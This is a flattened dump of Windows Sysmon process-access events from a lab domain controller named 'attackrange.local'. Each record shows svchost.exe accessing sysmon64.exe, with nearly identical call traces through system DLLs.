13:53:21.468{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001477Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.460{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001476Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.460{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001475Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.460{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001474Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.460{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001473Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.460{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001472Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.460{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001471Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.460{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001470Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.460{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001469Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.459{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001468Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.459{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001467Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.459{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001466Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.458{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001465Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.458{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001464Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.458{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001463Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.458{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001462Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.458{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001461Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.458{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001460Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.458{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001459Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.456{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001458Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.456{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001457Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.456{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001456Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.456{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001455Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.456{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001454Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 